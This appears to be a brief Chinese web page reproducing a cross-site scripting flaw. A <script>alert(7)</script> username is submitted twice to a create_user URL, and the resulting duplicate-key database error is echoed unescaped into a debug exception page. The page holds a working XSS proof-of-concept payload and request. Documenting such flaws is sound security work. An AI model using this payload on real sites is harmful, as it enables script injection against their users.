溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
漏洞復現:
1.創建個用戶:ip:8000/create_user/?username=<script>alert(7)</script>
顯示用戶已創建。
2.觸發漏洞,再次訪問ip:8000/create_user/?username=<script>alert(7)</script>
3.觸發異常:duplicate key value violates unique constraint "xss_user_username_key"
DETAIL: Key (username)=(<script>alert(7)</script>) already exists.
4.這個異常被拼接進The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception,最后觸發XSS。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
